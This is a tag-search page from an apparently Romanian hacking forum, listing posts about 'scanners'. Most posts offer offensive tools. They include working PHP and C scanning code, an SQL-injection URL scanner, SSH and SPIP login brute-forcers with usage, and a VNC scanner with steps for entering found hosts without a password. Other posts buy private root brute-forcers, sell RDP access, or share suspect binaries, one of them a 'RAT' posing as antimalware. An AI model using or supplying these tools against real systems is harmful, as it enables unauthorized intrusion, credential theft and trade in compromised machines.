Jump to content

Search the Community

Showing results for tags 'scanner'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. [align=center]SCAN RAT V2.2 As the title says , i am sharing with you an amazing AIO software , developped by FudMario ( all credits go to him )dedicated to scan your system to detect and delete any malwares , with many features and options ... I found this software on another forum and after on test i find it absolutely usefull and really HQ , here is some pictures of this software : Don't worry guys if you saw spanish language on the screenshots, the vesrion posted here is available in english and spanish Here is what the differents tabs are : -Principal : here you will get all your system informations , also the coder's contacts .. -Scanner : here , you will be able to lauch a complete scan to detect if any malwares is running on your system -Process Viewer : here you will have a complete list of the running processes , no need to open your task manager anymore -Start up : you will be able to detect all the applications laucnhed with windows so if a start up is on your system you will be able to find it and analyse it -Event viewer :to check every event or incident on your system -USB cleaner : this feature will allow you to scan and clean all USB devices to guarantee a perfect security of your system -Lock Folder : will allow you to lock/unlock any folder on your system Here is now some scan of the software : https://www.metascan-online.com/en/scanresult/file/815d0d8a9c2c447fa21bd1b681b76204 https://anubis.iseclab.org/?action=result&task_id=17a219a5724f70bb4bd4c48798e43776a&format=html Download Scan-RAT v2.2 : hxxps://www.sendspace.com/file/39ptx0 Credits : all credits of this software go to FudMario who offer us a great AIO software , thanks to him [/align] //usr6 Descarcati doar pentru analiza https://malwr.com/analysis/MTk0OGZmNDEwOTAwNDcwZGExYTQ0MDA1MzA4ZjJhYzM/
  2. SPIP (CMS) Scanner for penetration testing purpose written in Python, and released under MIT License. This tool has been designed to perform detection of SPIP installs during penetration testing. Currently, the tool detects the version of the SPIP install and tries to detect if the platform uses some of the top 30 plugins (listed on their website) Usage: $ python spipscan.py Usage: spipscan.py [options] Options: -h, --help show this help message and exit --website=WEBSITE Website to pentest --path=PATH Path for webapp (default : "/") --plugins Detect plugins installed --themes Detect themes installed --users Bruteforce user logins --sensitive_folders Detect sensitive folders --version Detect version --vulns Detect possible vulns --bruteforce_plugins_file=BRUTEFORCE_PLUGINS_FILE Bruteforce plugin file (eg. plugins_name.db) --bruteforce_themes_file=BRUTEFORCE_THEMES_FILE Bruteforce theme file (eg. themes_name.db) --bruteforce_logins_file=BRUTEFORCE_LOGINS_FILE Bruteforce login file (eg. user_logins.db) --verbose Verbose mode Version detection: $ python spipscan.py --website=http://127.0.0.1 --version Result: Application is located here : http://127.0.0.1/ [!] Version is : 3.0.13 [!] Plugin folder is : plugins-dist/ Plugins detection: $ python spipscan.py --website=http://127.0.0.1 --plugins Result: [!] Plugin folder is : plugins-dist/ [!] folder plugins-dist/ is accessible [!] Plugin breves detected. Version : 1.3.5 [!] Plugin compagnon detected. Version : 1.4.1 [!] Plugin compresseur detected. Version : 1.8.6 [!] Plugin dump detected. Version : 1.6.7 [!] Plugin filtres_images detected. Version : 1.1.7 [!] Plugin forum detected. Version : 1.8.29 [!] Plugin jquery_ui detected. Version : 1.8.21 [!] Plugin mediabox detected. Version : 0.8.4 [!] Plugin medias detected. Version : 2.7.51 [!] Plugin mots detected. Version : 2.4.10 [!] Plugin msie_compat detected. Versoin : 1.2.0 [!] Plugin organiseur detected. Version : 0.8.10 [!] Plugin petitions detected. Version : 1.4.4 [!] Plugin porte_plume detected. Version : 1.12.4 [!] Plugin revisions detected. Version : 1.7.6 [!] Plugin safehtml detected. Version : 1.4.0 [!] Plugin sites detected. Version : 1.7.10 [!] Plugin squelettes_par_rubrique detected. Version : 1.1.1 [!] Plugin statistiques detected. Version : 0.4.19 [!] Plugin svp detected. Version : 0.80.18 [!] Plugin textwheel detected. Version : 0.8.17 [!] Plugin urls_etendues detected. Version : 1.4.15 [!] Plugin vertebres detected. Version : 1.2.2 The next example performs brute force to detect existing plugins : $ python spipscan.py --website=http://website.com --plugins --bruteforce_plugins=plugins_name.db Plugins bruteforce: $ python spipscan.py --website=http://127.0.0.1 --bruteforce_plugins=plugins_name.db Result: Application is located here : http://127.0.0.1/ [!] Plugin folder is : plugins/ [-] Access forbidden on folder. [-] Trying : http://127.0.0.1/plugins/cfg/plugin.xml [-] Trying : http://127.0.0.1/plugins/cfg/paquet.xml [-] Trying : http://127.0.0.1/plugins/spip-bonux-3/plugin.xml [-] Trying : http://127.0.0.1/plugins/spip-bonux-3/paquet.xml [-] Trying : http://127.0.0.1/plugins/couteau_suisse/plugin.xml [-] Trying : http://127.0.0.1/plugins/couteau_suisse/paquet.xml [-] Trying : http://127.0.0.1/plugins/couteau_suisse_191/plugin.xml [-] Trying : http://127.0.0.1/plugins/couteau_suisse_191/paquet.xml [-] Trying : http://127.0.0.1/plugins/saisies/plugin.xml [-] Trying : http://127.0.0.1/plugins/saisies/paquet.xml Themes detection: $ python spipscan.py --website=http://127.0.0.1 --themes Result: Application is located here : http://127.0.0.1/ [-] We haven't been able to locate the themes folder Themes bruteforce: $ python spipscan.py --website=http://127.0.0.1 --bruteforce_themes=themes_name.db Result: Application is located here : http://127.0.0.1/ [!] Theme folder is : themes/ [-] Access forbidden on folder. [-] Trying : http://127.0.0.1/themes/scolaspip_3_0/plugin.xml [-] Trying : http://127.0.0.1/themes/scolaspip_3_0/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_einsteiniumist/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_einsteiniumist/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_brownie/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_brownie/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_brownie_v1/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_brownie_v1/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_darmstadtiumoid/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_darmstadtiumoid/paquet.xml [-] Trying : http://127.0.0.1/themes/squelette_darmstadtiumoid/plugin.xml [-] Trying : http://127.0.0.1/themes/squelette_darmstadtiumoid/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_brominerary/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_brominerary/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_tincredible/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_tincredible/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_maparaan/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_maparaan/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_initializr/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_initializr/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_ooCSS/plugin.xml [-] Trying : http://127.0.0.1/themes/theme_ooCSS/paquet.xml [-] Trying : http://127.0.0.1/themes/theme_californiumite/plugin.xml Vulnerabilities identification: $ python spipscan.py --website=http://127.0.0.1 --vulns Result: Application is located here : http://127.0.0.1/ [!] Version is : 2.1.12 [!] Plugin folder is : plugins/ [!] Potential Vulnerability : (versions : 2.0.21/2.1.16/3.0.3), SPIP connect Parameter PHP Injection, details : http://www.exploit-db.com/exploits/27941/ Sensitive folder identification: $ python spipscan.py --website=http://127.0.0.1 --sensitive_folders --verbose Result: Application is located here : http://127.0.0.1/ [!] Directory listing on folder : IMG/ [!] Directory listing on folder : prive/ [!] Directory listing on folder : local/ [!] Directory listing on folder : config/ [!] Directory listing on folder : local/ Bruteforce login on SPIP (v. 2.0.X): $ python spipscan.py --website=http://127.0.0.1 --path=/spip/ --users --bruteforce_logins_file=user_logins.db --verbose Result: Application is located here : http://127.0.0.1/spip/ [!] Version (in Headers) is : 2.0.24 Accessing http://127.0.0.1/spip/spip.php?page=login Form action args grabbed : 22S1TEIR6Ic7X9s41uTT+P8ntpRsNhjruYi5UZ5P8VMJ5VjfgqFrBeoa5+xz/roi9UtxAqw+j7bSTZiHHwjtj/kkOnzorNLXOneOGWXYIgNJI3uZdvq374q8NtT5nL7n56mO4+rJePWrUAhEXw== [!] Login found : admin [-] Tried login : administrator [-] Tried login : test [-] Tried login : guest [-] Tried login : root [-] Tried login : backup Download ZIP Source
  3. Sqli Binger works with Bing and automatically finds sqli vuln sites on same server. Here is a demo how it works . Click here to see the demo. Download Link : Click Here virus scan Link : Click Here Password : gameover Enjoy Hacking !!
  4. Am de gand sa cumpar si eu un scanner ssh (rooturi) care sa faca si bruteforce cu o lista de parole predefinita. Tin sa precizez ca nu vreu scannere publice, ceva privat sau mai greu de obtinut. Conditii: - Trebuie sa fii membru de incredere - Nu cumpar daca nu prezinti dovezi ca detii acel scanner - Un video cu scanneru in actiune - Platesc numai Payza Cei interesati sa-mi trimita un PM cu raportu root/24h, si cum sa-i contactez. Suma disponibila: 10$
  5. #!/usr/bin/env python """ Scanner pentru orice cu o adresa IP si care nu are parola && user (sper sa-i fie de folos cuiva) """ import sys import socket import struct raw_ip = raw_input("Enter the starting IP address: ") port = raw_input("Enter the port you want to scan: ") ip_number = raw_input("Enter the numer of IPs you want to scan: ") print "Working..." ip2int = lambda ipstr: struct.unpack('!I', socket.inet_aton(ipstr))[0] int2ip = lambda n: socket.inet_ntoa(struct.pack('!I', n)) ip_number = int(ip_number) inted_ip = ip2int(raw_ip) i = 1 while i <= ip_number: if i == ip_number: print 'Job Done.' try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((raw_ip, int(port))) if result == 0: f = open('list.txt', 'w') f.write(int2ip(inted_ip) + ':' + port + '\n') else: print "Nothing found." inted_ip+=i sock.close() except KeyboardInterrupt: print "Exiting..." sys.exit() except socket.error: print "Could not connect to the server. Exiting..." sys.exit() i += 1;
  6. HostBox SSH is a SSH password/account scanner written in python. README 2.0 Install INSTALLING WXPYTHON ------------------- http://wiki.wxpython.org/InstallingOnUbuntuOrDebian INSTALLING PARAMIKO ------------------- sudo apt-get install python-paramiko 3.0 Usage To run HB in GUI mode: --------------------- ./HostBox-SSH.py Should start the GUI, alt. try: "python HostBox-SSH.py" or "chmod +x HostBox-SSH.py && ./HostBox-SSH.py To run HB in Console mode: ------------------------- ./HostBox-SSH -h For help with command line options Command line options: HostBox-SSH.py -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2] [-n/-f] Username Options: -u user1,user2,user3.. || --ufile=usernames.txt Password Options: -p pass1,pass2,pass3.. || --pfile=passwords.txt Break Options: -1: Break on account login -2: Break on server login Speed Options: -n for normal scan || -f for fast scan mode Examples: ./HostBox.py -i ip-list.txt -u guest,test,root -p blank,-username,password -1 -n This is running hostbox listing usernames and password settings on the commandline. -1 is break account testing when a login is found for that account. -n means normal scan speed. ./HostBox.py -i ip-list.txt --ufile=usernames.txt --pfile=passwords.txt -2 -f This is running hostbox listing usernames and passwords from a textfile. -2 means the scanner will break testing the server when a login is found for that server. -f is for fast scan mode or multithreaded scan. "-username" and "blank" in the username/password spec tells the scanner to use the username as password / check for blank passwords. VISIT OSKAR STRIDSMAN'S IT RESOURCE -- StridsmanIT.wordpress.com -- HostBox-SSH 0.2 REPORT BUGS TO: https://stridsmanit.wordpress.com/ssh-scanner/ Download HostBox SSH 0.2 ? Packet Storm
  7. P.Y.M.P. Scanner unealta de securitate SSH P.Y.M.P. este un scanner si bruteforcer(bazat pe dicitonar) pentru servere SSH. Avand performanta net superioara fata de concurenta, si o interfata usor de utilizat si prietenoasa, P.Y.M.P. Scanner este si cross-platform, putand fi rulat atat pe sistemele de operare de la Microsoft, cat si pe orice distributie Linux. Acum, vom lasa imaginile sa vorbeasca pentru noi: Programul nu este gratuit, dar avand in vedere ca suntem romani si autorul/autoarea/autorii/autistii acestui program este/sunt utilizatori RST, membrii forumului vor beneficicia de oferta cumperi o cheie primesti alta gratis(adica 50% reducere pe romaneste) si o vaza de lut facuta de calugari beduini autisti(bateriile nu sunt incluse). Pachetele magice: [*=center]20 chei - 39.99 EUR [*=center]40 chei - 49.69 EUR [*=center]100 chei - 80.10 EUR [*=center]Numar specificat de chei - negociabil [*=center]Nelimitat/Fara licenta - 400 EUR Transport gratuit Plata se face prin PayPal momentan. Pentru comenzi si alte intrebari in legatura cu aceste chei si alte detalii , puteti folosi sistemul de MP(mesagerie privata) integrat in forum sau la adresa de mail ntchex[at]yahoo.com P.S --- Q2luZSBlc3RlIG1haSB2ZWNoaSBwZSBmb3J1bSBzdGllIGNpbmUgc3VudC9zdW50ZW0vZXN0ZW0gc2kgcG90IGdhcmFudGEgbGVnaXRpbWl0YXRlYSBhY2VzdHVpIHByb2R1cy4=
  8. /* * Simple & dirty telnetd encryption scanner by Kingcope * Year 2011 * * Compile : gcc telnetscan.c -o telnetscan -lpthread */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <pthread.h> #include <sys/time.h> #include <fcntl.h> #include <errno.h> #define MAX_THREADS 50 #define CONNECT_TIMEOUT 3 // in seconds #define MAX_BUF 100 void *telnet(void *arg) { int sockd; int count; struct sockaddr_in serv_name; unsigned char buf[MAX_BUF]; char ip[256]; char saveip[256]; char request[1024]; char req_enc[6] = "\xff\xfd\x26\xff\xfb\x26"; int status; FILE *f; strcpy(ip, (char*)arg); sockd = socket(AF_INET, SOCK_STREAM, 0); if (sockd == -1) { perror("Socket creation"); return NULL; } serv_name.sin_family = AF_INET; inet_aton(ip, &serv_name.sin_addr); serv_name.sin_port = htons(23); unsigned long iMode = 1; status = connect(sockd, (struct sockaddr*)&serv_name, sizeof(serv_name)); if (status == -1) { close(sockd); return NULL; } count = read(sockd, buf, MAX_BUF); memcpy(request, req_enc, 6); write(sockd, request, 6); count = read(sockd, buf, MAX_BUF); if (buf[0]==0xff&&buf[1]==0xfb&&buf[2]==0x26&&buf[3]==0xff&&buf[4]==0xfd&&buf[5]==0x26) { printf("\n%s supports encryption\n", ip); snprintf(saveip, sizeof(saveip), "%s\n", ip); f = fopen("scan.log", "a"); fputs(saveip, f); fclose(f); close(sockd); return NULL; } close(sockd); return NULL; } void usage(char *argv[]) { printf("%s <startip> <endip>\n", argv[0]); exit(0); } void parseip(char *ip, int *a1, int *a2, int *a3, int *a4) { char *pos,*pos2,*pos3; pos = strchr(ip, '.'); if ((!pos) || (pos-ip > 3)) { printf("Invalid ip.\n"); exit(0); } *pos=0; *a1 = atoi(ip); pos2 = strchr(pos+1, '.'); if ((!pos2) || (pos2-(pos+1) > 3)) { printf("Invalid ip.\n"); exit(0); } *pos2=0; *a2 = atoi(pos+1); pos3 = strchr(pos2+1, '.'); if ((!pos3) || (pos3-(pos2+1) > 3)) { printf("Invalid ip.\n"); exit(0); } *pos3=0; *a3 = atoi(pos2+1); if (strlen(pos3+1) > 3) { printf("Invalid ip\n"); exit(0); } *a4 = atoi(pos3+1); } int main(int argc, char *argv[]) { char *startip; char *endip; int a1,a2,a3,a4; int b1,b2,b3,b4; pthread_t threads[512]; int threads_running[512]; char scanip[256]; int k,k1,k2,k3,k4; printf("telnetd encryption scanner by Kingcope\n"); if (argc != 3) usage(argv); startip = (char*)malloc(strlen(argv[1])+1); if (startip == NULL) { printf("error: malloc()\n"); exit(0); } strcpy(startip, argv[1]); endip = (char*)malloc(strlen(argv[2])+1); if (endip == NULL) { printf("error: malloc()\n"); exit(0); } strcpy(endip, argv[2]); parseip(startip, &a1, &a2, &a3, &a4); parseip(endip, &b1, &b2, &b3, &b4); printf("Starting scan from %d.%d.%d.%d to %d.%d.%d.%d\nSaving hits to scan.log\n", a1, a2, a3, a4, b1, b2, b3, b4); k1=a1; k2=a2; k3=a3; k4=a4; k=0; printf("CURRENT IP: %d.%d.%d.%d\n", k1, k2, k3, k4); fflush(stdout); for( { snprintf(scanip, sizeof(scanip), "%d.%d.%d.%d", k1, k2, k3, k4); threads_running[k] = time(NULL); if (pthread_create( &threads[k], NULL, telnet, (void*) scanip) != 0) { printf("Error: Could not create thread. Done.\n"); exit(0); } usleep(1000); k++; if (k==MAX_THREADS) { int kk; for (kk=0;kk<MAX_THREADS;kk++) { while (threads_running[kk] + CONNECT_TIMEOUT > time(NULL)) { __asm("nop"); } pthread_cancel(threads[kk]); pthread_join(threads[kk], NULL); } for (kk=0;kk<1024;kk++) { close(kk+4); } k=0; printf("CURRENT IP: %d.%d.%d.%d\n", k1, k2, k3, k4); fflush(stdout); } if (k4==b4 && k3==b3 && k2==b2 && k1==b1) { printf("\nscan finished\ndone.\n"); exit(0); } k4++; if (k4 == 256) { k3++; k4=0; } if (k3 == 256) { k2++; k3=0; } if (k2 == 256) { k1++; k2=0; } if (k1 == 256) { printf("\nscan finished\ndone.\n"); exit(0); } } return 0; }
  9. -world wide rdp -Administrator rdp -RDp mass sender plus lids -Rdp pentru scann (min 1 MB upload) -user/pass specifice Preturi accesibile Pm sau icq 607061381
  10. Aveti aici un scanner SSH mai nou: Download Scanner SSH + Bruteforcer v2 - 2012.zip Parola: WTBoS2JGbFlWbnBpTWtaNVdWaENhR050T1hOWlVUMDk=
  11. adonisslanic

    Lele

    Sql_err404
  12. Scanner VNC bypass Link Download : Aici Cum se foloseste? - Odata descarcat: tar xvf vnc.tar - pentru dezarhivare cd .v - pentru a accesa directorul chmod 777 * - pentru a da permisiile necesare, se poate folosii si (chmod +x *) doar pentru executare. Pentru cautarea claselor de Romania : Aici , la sfarsitul paginii unde sunt "Ultimele Vizite". Sau puteti cauta pe alte site-uri de genu. Pentru a incepe scanarea: ./a ip.ip - exemplu ./a 86.124 Dupa terminarea scanarii: cat vncs.log - pentru a vedea ip-urile gasite. Vnc1Scan.jpg Cu un client vnc oarecare va puteti conecta fara parola pe ip-urile respective.
  13. Gasite pe un rdp, dadea unu scan. Rulati in virtual machine sau sandboxie. Hscan Gui v. 1.2 Download: RDP.zip L.E: File Info Report date: 2012-02-22 23:54:13 (GMT 1) File name: taskmgr-exe File size: 126976 bytes MD5 Hash: 42be6717898901b0dc245800a219a3d1 SHA1 Hash: af8aced0a78e1181f4c307c78402481a589f8d07 Detection rate: 8 on 9 (89%) Status: INFECTED Detections Avast - Win32:Trojan-gen AVG - Avira AntiVir - APPL/Huc ClamAV - Hacktool.HScan-1 Comodo - TrojWare.Win32.HackTool.HScan.NAA Emsisoft - HackTool.Win32.HScan.a!IK F-Prot - W32/VirTool.BQV Ikarus - HackTool.Win32.HScan.a TrendMicro - HKTL_HUC X-Scan v3.3 GUI L.E: File Info Report date: 2012-02-23 00:01:43 (GMT 1) File name: xscan-gui-exe File size: 1784320 bytes MD5 Hash: 686dc3e581e47d8f86d26029787129e8 SHA1 Hash: a9e900510396192eb2ba4fb7b0ef786513f9b5ab Detection rate: 3 on 9 (33%) Status: INFECTED Detections Avast - AVG - Avira AntiVir - ClamAV - Comodo - Emsisoft - Application.Tool.Xscan!IK F-Prot - W32/MalwareF.TNJC Ikarus - Application.Tool.Xscan TrendMicro - Download: Xscan.zip
  14. Bluelog is a Bluetooth scanner/logger written with speed in mind. It is intended to be used as a site survey tool, concerned more about accurately detecting the number of discoverable Bluetooth devices than individual device specifics. Bluelog also includes the unique "Bluelog Live" mode, which puts discovered devices into a constantly updating live webpage which you can serve up with your HTTP daemon of choice. http://dl.packetstormsecurity.net/wireless/bluelog-1.0.0.tar.gz
  15. Am facut un mic script care scaneaza adresele url puse de voi intr-un fisier text. Nu e prea sofisticat, dar o sa ii mai aduc imbunatatiri. <?php echo'<title>URL List SQLi scanner</title>'; echo "<u><tr>Utilizare:</tr></br></u> Creeaza un fisier adrese.txt in care sa existe pe fiecare linie cate o adresa url</br> in formatul http://url.tld . Url-urile vulnerabile vor fi afisate si vor fi salvate si in fisierul bune.txt</br></br>"; $fisier = file_get_contents('adrese.txt'); // Citeste lista cu url-uri $linii = explode("\n", $fisier); // Preia fiecare url $fisier = fopen("bune.txt", "a"); // Aici le va pune pe cele vulnerabile echo"<u>Url-uri vulnerabile:</u></br></br>"; for($i = 0; $i < count($linii) - 1; $i++) scann($linii[$i]); // Testeaza fiecare url function scann($sqli) { global $fisier; $sintaxa="'"; $fraza=file_get_contents("$sqli$sintaxa"); $cuvant="error in your SQL syntax"; $pos = strpos($fraza,$cuvant); if($pos === false) { $ok=0; } else { $ok=1; } if($ok==1) { fwrite($fisier, $sqli . "\n"); // Scrie in bune.txt url-urile vulnerabile echo"$sqli <br>"; // Afiseaza url-urile vulnerabile } } fclose($fisier); // Inchide fisierul echo '<center></br></br>URL List SQLi Scanner v1.0 - Silvian0 @ <a href="http://rstcenter.com">RSTCenter.com</a></center>'; ?>
  16. URL Dumper is an Online scanner SQLi,XSS. Used too get XSS and SQL Injections vulns.. supports multi search engine, trash system, etc.. Features: -Get all page links by advanced technique with regular expression; -XSS Scanner (auto check all page links); -SQLInjection Scanner (auto check all page links); -Multi-Thread engine; -Get many links by search (google/Yahoo/Live Search/Altavista/Terravista) -Search in the page source by regular expression; -View Source (Code/Browser); -Trash system -Database in SQLite to organize the URL’s -Enabled Proxy server Descarca Cod sursa
  17. Salut, dupa cum spune si titlul as vrea sa cumpar un scanner SSH. Nu vreau sa imi vindeti versiuni publice... am folosit a cel putin 20 de scannere, cu diferite pass file-uri, etc. as vrea ceva unic, facut de propria mana. As putea oferi 10 euro transfer credit orange / vodafone / cosmote sau paypal. Doresc seriozitate.
×
×
  • Create New...